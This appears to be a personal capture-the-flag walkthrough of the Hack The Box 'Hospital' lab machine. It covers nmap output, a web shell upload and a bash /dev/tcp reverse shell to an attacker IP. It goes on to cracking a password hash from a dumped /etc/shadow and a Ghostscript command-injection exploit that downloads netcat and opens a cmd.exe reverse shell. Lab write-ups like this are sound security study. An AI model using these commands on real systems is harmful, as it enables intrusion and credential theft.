nmap:
    nmap 10.10.11.241 -sC -sV -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 15:01 EST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.64% done; ETC: 15:05 (0:03:47 remaining)
Nmap scan report for 10.10.11.241
Host is up (0.074s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
22/tcp   open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp   open  domain            Simple DNS Plus
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-01-15 03:05:14Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open  msmq?
2103/tcp open  msrpc             Microsoft Windows RPC
2105/tcp open  msrpc             Microsoft Windows RPC
2107/tcp open  msrpc             Microsoft Windows RPC
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after:  2024-03-06T18:39:34
| rdp-ntlm-info: 
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-01-15T03:06:10+00:00
5985/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6099/tcp open  msrpc             Microsoft Windows RPC
6406/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
6407/tcp open  msrpc             Microsoft Windows RPC
6409/tcp open  msrpc             Microsoft Windows RPC
6616/tcp open  msrpc             Microsoft Windows RPC
6639/tcp open  msrpc             Microsoft Windows RPC
8080/tcp open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp open  mc-nmf            .NET Message Framing
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-15T03:06:13
|_  start_date: N/A
|_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 341.22 seconds

entered http://10.10.11.241:8080/login.php

can register user in /register.php

after using dirsearch found:
    /config.php
    /login.php
    /register.php
    /upload.php

using script (https://github.com/flozz/p0wny-shell/blob/master/shell.php) i manage to get www-data reverse shell

now i need to bash reverse shell

To get reverse shell i used:
    /usr/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.120/4444 0>&1'
using python3 -c 'import pty;pty.spawn("/bin/bash")'

after using cat /etc/passwd we found there is a user name DrWilliams/Lucy Williams

uploaded linpeas to /tmp i found:
    Searching passwords in config PHP files
    /var/www/html/config.php:define('DB_PASSWORD', 'my$qls3rv1c3!');
    /var/www/html/config.php:define('DB_USERNAME', 'root');

going in to /var/www/html/config.php i found a name of DB - hospital

using mysql -u root hospital and entering the password i got in to the DB

there is only one table inside:
    users

after select * from users i got:
    +----+----------+--------------------------------------------------------------+---------------------+
| id | username | password                                                     | created_at          |
+----+----------+--------------------------------------------------------------+---------------------+
|  1 | admin    | $2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 | 2023-09-21 14:46:04 |
|  2 | patient  | $2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO | 2023-09-21 15:35:11 |
|  3 | admin2   | $2y$10$7v4l3hC1BnarrPkWuQrfDezk7V7dsdk2wTDdCwOs85ngcPdGESRkG | 2024-01-15 05:14:13 |
|  4 | test     | $2y$10$ik.POu32K/gMVW8O3E0sl.GF1iCZ2OXDglzeHm2O0MdiqLeEURYYy | 2024-01-15 07:05:10 |
+----+----------+--------------------------------------------------------------+---------------------+
4 rows in set (0.001 sec)

downloaded a script to /tmp folder and gave chmod +x and let it run

all over sudden the CVE-2023-2640.sh is worked

cat /etc/shadow and we get a hash
    drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
    root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::

copied a hash to text file and let john work

its hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])

let the hashcat do the work using hashcat (filename) /usr/share/wordlists/rockyou.txt
    $6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:   qwe123!@#

after that i can connect to https://hospital.htb ,its a mail Service

there is a hint that i need to do file in .eps format for GhostScript

find username drbrown

can you this (https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection?source=post_page-----edd713d784bb--------------------------------)

so i need to download the netcat(https://github.com/int0x33/nc.exe/)

I need to send 2 file,first injects to download from my machine the nc64.exe, the second triggers to reverse shell back to mean

    1)python3 CVE_2023_36664_exploit.py --inject --payload "curl 10.10.16.120:80/nc64.exe -o nc.exe" --filename file.eps
    2)python3 CVE_2023_36664_exploit.py --inject --payload "nc.exe 10.10.16.120 4444 -e cmd.exe" --filename nc64.exe

and i got the windows reverse shell

cd Desktop and there is the userflag.txt:
    7ed66a96c08bd8f3c89a52250f509a41

